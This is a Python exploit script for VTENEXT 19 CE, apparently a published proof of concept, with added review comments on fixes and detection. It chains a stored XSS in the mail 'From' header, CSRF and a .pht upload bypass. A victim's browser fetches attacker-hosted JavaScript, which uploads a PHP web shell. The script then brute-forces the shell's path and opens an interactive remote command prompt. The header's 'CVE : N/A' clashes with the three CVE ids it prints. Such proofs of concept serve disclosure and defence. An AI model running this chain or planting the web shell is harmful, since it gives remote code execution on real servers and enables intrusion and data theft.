#!/usr/bin/python3
# Exploit Title: VTENEXT 19 CE - Remote Code Execution
# Google Dork: n/a
# Date: 2020/09/09
# Exploit Author: Marco Ruela
# Vendor Homepage: https://www.vtenext.com/en/
# Software Link: Vendor removed vulnerable version from sourceforge.net
# Version: 19 CE
# Tested on: Ubuntu 16.04
# CVE : N/A
# 2020/03/07 - Disclosed vulnerabilities to vendor
# 2020/03/10 - Vendor committed to fix
# 2020/09/09 - Public disclosure
# This script should be easy enough to follow.
# We string together the three vulnerabilities to get RCE.
# XSS - The "From" field of the VTENEXT Messages module is vulnerable.
# File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default.
# CSRF - No CSRF protections in place.
# exploit.js needs to be hosted somewhere, IPs need to be replaced
# check_csrf() should be changed based on your setup
# run_shell() is a "nice to have"
# content of exploit.js
#
# NOTE(review): the triple-quoted block below is a module-level string
# literal, not executed Python; nothing in this file reads it. It only
# documents the JavaScript that the <script src=...> injected via the mail
# From header is expected to load. The two lines that matter to a defender
# are `xhr.withCredentials = true` (the victim's own session cookie is what
# authorises the upload request — a SameSite cookie attribute or a
# per-request CSRF token on the upload endpoint breaks this step) and the
# "shell.pht" filename (a deny-list that omits .pht is the upload flaw; an
# allow-list of non-executable extensions, plus not executing anything
# served from the storage/ tree, is the robust fix).
"""
function insertImage() {
var xhr = new XMLHttpRequest();
xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);
xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');
xhr.setRequestHeader('Content-Length', '248');
xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');
xhr.withCredentials = true;
var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
insertImage();
"""
# Standard library, plus the third-party `requests` package used for the
# HTTP probing further down.
import smtplib
import datetime
import requests
import os
import time
# Target instance; every URL below is built from this prefix.
base_url = "http://192.168.226.168/vtenext19ce/"
# NOTE(review): the file header states "CVE : N/A" while this banner names
# three CVE ids; the two disagree and one of them should be corrected.
print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")


def build_url() -> str:
    """Return the storage folder URL an upload made today is expected to land in.

    The path is ``<base_url>storage/home/1/<year>/<month name>/week<N>/``,
    where N is today's ISO week number minus the ISO week number of the 1st
    of the month. This presumably mirrors how the application lays out its
    per-user storage directories, with "1" being a user id — confirm against
    the server's storage tree; nothing in this file verifies it.

    Returns:
        The folder URL, ending in a slash.
    """
    d = datetime.datetime.today()
    year = str(d.year)
    month = str(d.strftime("%B"))
    # Week-of-month from ISO week numbers. Both values come from this host's
    # local clock, so clock or timezone skew against the server changes the
    # folder name that is probed later.
    week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])
    tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"
    return(tmp)


def build_mail() -> str:
    """Build the raw message text whose From header carries the XSS payload.

    The From value is a literal ``<script src=...>`` tag; per the header
    notes the Messages module renders the From field without output
    encoding, which is the XSS flaw. The application-side fix is to
    HTML-encode the header on output; an inbound mail filter that rejects
    angle brackets or "<script" inside address headers would also flag this
    message before it reaches a mailbox.

    Returns:
        From, To and Subject headers, a blank line, then the body.
    """
    _from = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""
    _to = "admin@example.com"
    _subject = "Important!"
    _body = "While you're reading this, a file is being uploaded to this server."
    msg = "From: " + _from + "\n"
    msg += "To: " + _to + "\n"
    msg += "Subject: " + _subject + "\n\n"
    msg += _body
    return msg
def send_mail() -> None:
    """Deliver the crafted message over plain SMTP (no authentication, no TLS).

    Relay host, port, sender and recipient are hard-coded lab values; the
    recipient is the VTENEXT user who will open the message. The session is
    never closed explicitly (no quit()), so the socket is left to the
    interpreter. Note the SMTP envelope recipient (admin@lab.local) differs
    from the "To:" header written by build_mail().
    """
    msg = build_mail()
    smtp_server = '192.168.226.167'
    smtp_port = 25
    sender = 'user1@lab.local'
    receiver = 'admin@lab.local'
    server = smtplib.SMTP(smtp_server, smtp_port)
    server.sendmail(sender, receiver, msg)


def check_csrf() -> None:
    """Block until the local Apache access log shows exploit.js was fetched.

    Runs ``tail -n1 /var/log/apache2/access.log`` through os.popen every
    0.5 s and returns once the last line contains "200", "/exploit.js" and
    ``base_url`` (presumably the Referer field of a combined-format log
    entry). This assumes exploit.js is served by an Apache on this same
    host and that this process can read its log — the header says to adapt
    it. Only the last log line is inspected, so any later request to that
    web server replaces the line being matched; there is no timeout, and
    the loop can spin indefinitely.
    """
    while True:
        is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()
        if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:
            print("[>] CSRF triggered")
            break
        else:
            time.sleep(0.5)
            continue


def find_shell():
    """Locate the uploaded file by probing ``<folder><i>_shell.pht`` for i in 1..9998.

    The numeric "<i>_" prefix is inferred from this probe pattern alone —
    it presumably is an id the application prepends to stored files;
    confirm against the real storage layout. Every miss is a GET with a
    non-200 answer, so a run of this function leaves a burst of sequential
    requests for *_shell.pht under storage/home/ in the target's web log,
    which is a simple detection signal (and, for the web server, a reason
    not to serve or execute anything from the upload tree at all).

    Returns:
        The first URL that answers 200, or None when none of the 9998
        candidates does — the caller below does not handle the None case and
        would fail in run_shell().
    """
    print("[>] Locating shell")
    time.sleep(1)
    tmp1 = build_url()
    for i in range(1, 9999):
        url = tmp1 + str(i) + "_shell.pht"
        r = requests.get(url)
        if r.status_code == 200:
            print("[>] Found the shell")
            print("[-] Location: " + url)
            return url
        else:
            continue


def run_shell(x: str) -> None:
    """Interactive loop: read a line, GET ``<x>?x=<line>``, print the response body.

    ``x`` is the URL of the uploaded .pht, which hands the ``x`` query
    parameter to system() (see the exploit.js string at the top of the
    file). The typed text is appended to the URL as-is, with no encoding
    done here. Typing "exit" ends the loop. Server-side, each command is
    visible in the access log as a GET with an ``x=`` query string against
    a file under storage/ — a second detection point for this chain.
    """
    print("\n")
    while True:
        cmd = input("shell> ")
        if cmd == "exit":
            break
        else:
            url = x + "?x=" + cmd
            r = requests.get(url)
            print(r.text)


# Main flow, run at import time (no __main__ guard): send the mail, wait for
# the victim to trigger the XSS/CSRF upload, locate the file, then interact.
print("[>] Sending email")
send_mail()
print("[-] Waiting for user to open mail")
check_csrf()
shell_location = find_shell()
run_shell(shell_location)
print("[!] Done!")